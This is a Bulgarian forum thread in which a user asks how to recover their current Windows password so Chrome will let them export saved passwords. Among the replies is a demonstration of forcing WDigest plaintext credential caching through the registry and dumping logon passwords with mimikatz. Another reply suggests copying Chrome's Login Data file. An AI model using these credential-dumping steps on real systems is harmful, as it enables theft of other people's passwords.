Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

Парола на Windows - мога ли да я видя ?

Featured Replies

Хмм

И аз тука с'я като теб "Ко каза̀, ко?" - к'во чака до сега , задаваш риторични въпроси. Нали уш му предложи.. 
Новата парола по обичайния ред не решавала проблема с хром според него.

на 5.10.2023 г. в 14:47, Т.Христов написа:

Не искам да сменя паролата на Windows-a, искам да видя коя е текущата. Има ли начин?

И 'що толко' сложно?! Ами ако има по-лесен начин добре дошло УЕЛКОМЕ.Някви идеи?!

Като имаш желание "примерно" предостави му като услуга свържи се с него отдалечено нагласи му синхронизацията, гарантирай му , че няма да му се изгубят паролите в облака.
Смени му паролата. И проблемът е решен. По-живо по-здраво.

Излизам, следващите дни ще видя после.

Чеерс 

• Отговори 90
  • Прегледи 10,2k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

• И бормашината може да се ползва да разбиеш брава и да си направиш дупка за пирон за картина/закачалка. И компютъра може да се ползва да работа, игри, сърфиране и за хакване. И с колата можеш да прегаз

• Е не е така, защото реално са разпространени свободно в нета, а не в тъмните къчета. Това за какви цели ще се използват вече си зависи от ползвателя. В смисъл туловете са легални, но потребителя си но

• Е, от 4-5 инструмента все един ще покаже истината. Затова се зарежда кобуръ с дублиращи се по функционал инструменти - да има...

Публикувани изображения

• Автор
преди 2 часа, цър-вул написа:

И 'що толко' сложно като може просто да си пусне синхронизацията с Google, да изчака 1-2 часа, да ресетне паролата, да изчака още час-два и ще си има достъпа до паролите на хром, защото ще има нова парола за вписване в Windows профила и синхронизирани с облака пароли.

За синхронизация ще ми поиска пак парола на юзера. И преди и след синхронизацията.

Ще ти поиска, и то евентуално ако не си логнат, парола за логване в google акаунта. Ако си логнат - директно ще синхронизира.
Аз съм с автоматично вписване в Windows и сiнхронизация в google. Не ми иска парола.

• Автор
преди 2 часа, цър-вул написа:

Ще ти поиска, и то евентуално ако не си логнат, парола за логване в google акаунта. Ако си логнат - директно ще синхронизира.
Аз съм с автоматично вписване в Windows и сiнхронизация в google. Не ми иска парола.

Да де, ама аз не съм бил никога логнат. Ще иска.

преди 51 минути, Gangosa написа:

Един hiren's boot cd зареждаш уина и от там отваряш браузера.Трябва да стане.

Не се знае дали въобще hirens bott ще помогне. Защото примерно ако автора си е сложил да кажем паролата преди 2-3 години и не е синхронизирал акаунта и сега реши да си синхронизира акаунта паролата няма да се покаже. Било то и да е оставено да я помни браузера.

Аз само да питам - а потребителска регистрация в Хром имате ли ? Защото паролата на Windows е едно, а паролата на Хром е друго. Според мен, няма логика да иска парола за Windows при работа с Хром. Хром се регистрира с Гугъл акаунт, както каза и @цър-вул

• Автор
преди 1 минута, 2249 написа:

Аз само да питам - а потребителска регистрация в Хром имате ли ? Защото паролата на Windows е едно, а паролата на Хром е друго. Според мен, няма логика да иска парола за Windows при работа с Хром. Хром се регистрира с Гугъл акаунт, както каза и @цър-вул

Когато в началото, поисках Хрома да ми експортира записаните пароли - ми поиска паролата на потребителя за Windows.

преди 4 минути, Т.Христов написа:

Когато в началото, поисках Хрома да ми експортира записаните пароли - ми поиска паролата на потребителя за Windows.

Според мен това е невъзможно. Нещо сте се объркали. Най - вероятно Ви е поискал акаунт в геугъл. А пробвахте ли да регистрирате Хром с гугълски акаунт ?

• Автор
преди 2 часа, 2249 написа:

Според мен това е невъзможно. Нещо сте се объркали. Най - вероятно Ви е поискал акаунт в геугъл. А пробвахте ли да регистрирате Хром с гугълски акаунт ?

Не, брах вече ядове. Добре че имах копие направено с AOMEI, та възстанових диска.

Когато искам експорт на паролите от Хрома - ИСКА ПАРОЛА НА ЮЗЕРА! Паролата му за Windows! За това и пиша тук.

Добре де, в Хром>Password Manager> имаш всички пароли.

Като те мързи да ги пишеш, си правиш скрийншот.

При положение че не може да си настрои ЕОН...

Това е варианта.

Аз пък искам да видя как за експорт на пароли Хром иска потребителска парола за операционната система ... Възможно ли е някаква гадина да се е намесила ?

преди 5 часа, 2249 написа:

Аз пък искам да видя как за експорт на пароли Хром иска потребителска парола за операционната система ... Възможно ли е някаква гадина да се е намесила ?

Не ползвам Хром, но дали Master Password при Хром не ползва паролата на акаунта, а не custom зададена такава? При Mozilla ползва custom такава, в Edge не съм пробвал. Трябва да тествам. За Chrome не знам. Навремето нямаха Master Password и паролите ги съхраняваше в чист текстов вид. За да не окуражават потребителите да ги запаметяват вътре. Което не е чак толкова лоша практика, защото Master Password-a реално криптира добре. Пробвал съм да ги пробия в редица тулчета и се провалиха всичките. Дори в една статия наскоро, където ги бяха пробили се казва, че пробива е станал без Master парола. Но пък правили теста с настройки по подразбиране, а тогава тя не била пусната, но както и да е. Да не се отклонявам. После клекнаха при настояване на потребителите и видяха, че от конкурентите имат и те добавиха. Въпроса е дали не ползва тази на самия акаунт (някъде май бях мернал това). Ако да, това би обяснило защо иска Win паролата. Въпроса е ако се reset-не паролата на Win-a под PE среда дали после няма да стане с новата парола направо. Но си е малко рисковано ако не стане.

Не видях автора да е писал дали е пробвал с тула, който и аз му дадох.

на 9.10.2023 г. в 16:05, цър-вул написа:

Що си дърпаш гз? Авторът следва твоите съвети...

Дръпни си "гз"ти като ти скимне. Щ'о не. Попитах за идеи съвсем сериозно.Мен не ме мисли, аз правя каквото си искам... смисъл не съм задължен.
Напротив, гледа си интереса и твърди , че уш пробвал повечето. Пък и всеки си има глава на раменете си! Всеки е свободен да решава и прави както сметне за добре!
И все пак от мн акъли...има една поговорка "Много баби, хилаво бебе/дете".

преди 6 часа, 2249 написа:

С цел превенция, иска аутентификация по същия начин както и на друга операционна система например андроид.
Като няма акаунт, и не си сложил ПИН, Парола,screen lock pattern. Няма да ти покаже дори записаните пароли на регистрациите докато не си сложиш.
И по обичайния начин ще видиш пароли на куково лято.

Преди имаше опция да се изключи в chrome://flags - Disable Password Manager Re-Authentication в новите версии май, може би няма.
Windows Hello мисля , че можеше да се изключи в последните версии.
Chrome Setting => Auto-fill => Password Manager => turn off Use Windows Hello when filling password.

• Автор
преди 46 минути, B-boy/StyLe/ написа:

Не ползвам Хром, но дали Master Password при Хром не ползва паролата на акаунта, а не custom зададена такава? При Mozilla ползва custom такава, в Edge не съм пробвал. Трябва да тествам. За Chrome не знам. Навремето нямаха Master Password и паролите ги съхраняваше в чист текстов вид. За да не окуражават потребителите да ги запаметяват вътре. Което не е чак толкова лоша практика, защото Master Password-a реално криптира добре. Пробвал съм да ги пробия в редица тулчета и се провалиха всичките. Дори в една статия наскоро, където ги бяха пробили се казва, че пробива е станал без Master парола. Но пък правили теста с настройки по подразбиране, а тогава тя не била пусната, но както и да е. Да не се отклонявам. После клекнаха при настояване на потребителите и видяха, че от конкурентите имат и те добавиха. Въпроса е дали не ползва тази на самия акаунт (някъде май бях мернал това). Ако да, това би обяснило защо иска Win паролата. Въпроса е ако се reset-не паролата на Win-a под PE среда дали после няма да стане с новата парола направо. Но си е малко рисковано ако не стане.

Не видях автора да е писал дали е пробвал с тула, който и аз му дадох.

Разбрах. Ще пробвам утре все пак и дано не поиска паролата за Windows. После ще пиша тук.

Все пак остава въпроса - не можеше ли да видя/открия паролата за джама ...

преди 14 минути, Т.Христов написа:

Разбрах. Ще пробвам утре все пак и дано не поиска паролата за Windows. После ще пиша тук.

Все пак остава въпроса - не можеше ли да видя/открия паролата за джама ...

То и да я поиска нали ще я смениш с такава, каквато знаеш вече или просто ще оставиш празно поле (в смисъл без парола).

Но пак казвам, това е само теория, която повтарям не съм тествал лично.

Що се отнася до втория ти въпрос как да ти кажа, като ти не сподели мнение за този тул:

https://securityxploded.com/windows-autologin-password.php

Windows 10 Enterprise

Форсване на Wdigest да съхрани паролите в обикновен текст в паметта!

Създаден нов потребител с администраторски привилегии.
Потребителскоиме: KAL_TEST_USER
Парола: P@ssw0rd1337

Добавяне на вече споменатия регистър:

User> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
The operation completed successfully.

User> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

User> shutdown -r -t 0
Restart/Reboot

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::wdigest

За спиране по същия начин само се сменя:
UserLogonCredential=1 на UserLogonCredential=0

dumper.png

преди 2 часа, B-boy/StyLe/ написа:

Въпроса е ако се reset-не паролата на Win-a под PE среда дали после няма да стане с новата парола направо. Но си е малко рисковано ако не стане.

Не става, защото ако се смени паролата на WIn, Croma излиза от акаунта ако имаш и после трябва пак да влезеш,за да ги синхронизира, ако няма акаунт ще изчезнат и паролите които са запомнени.

преди 10 часа, Т.Христов написа:

Не, брах вече ядове. Добре че имах копие направено с AOMEI, та възстанових диска.

Копирай си файла Login Data от папка "%LocalAppData%\Google\Chrome\User Data\Default" някъде и ресетвай. Този файл съдържа нужното инфо.

• Автор
преди 1 час, B-boy/StyLe/ написа:

То и да я поиска нали ще я смениш с такава, каквато знаеш вече или просто ще оставиш празно поле (в смисъл без парола).

Но пак казвам, това е само теория, която повтарям не съм тествал лично.

Що се отнася до втория ти въпрос как да ти кажа, като ти не сподели мнение за този тул:

https://securityxploded.com/windows-autologin-password.php

Ами - иска пари.

22.jpg.817fc4f052e004d9ea1860fa705e5eba.jpg

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.

Гост
Публикацията ви съдържа термини, които не допускаме! Моля, редактирайте съдържанието си и премахнете подчертаните думи по-долу. Ако замените букви от думата със звездички или друго, за да заобиколите това предупреждение, профилът ви ще бъде блокиран и наказан!
Напишете отговор в тази тема...

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    25%
    Дарени 252.69 EUR от нужните 1,000.00 EUR

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.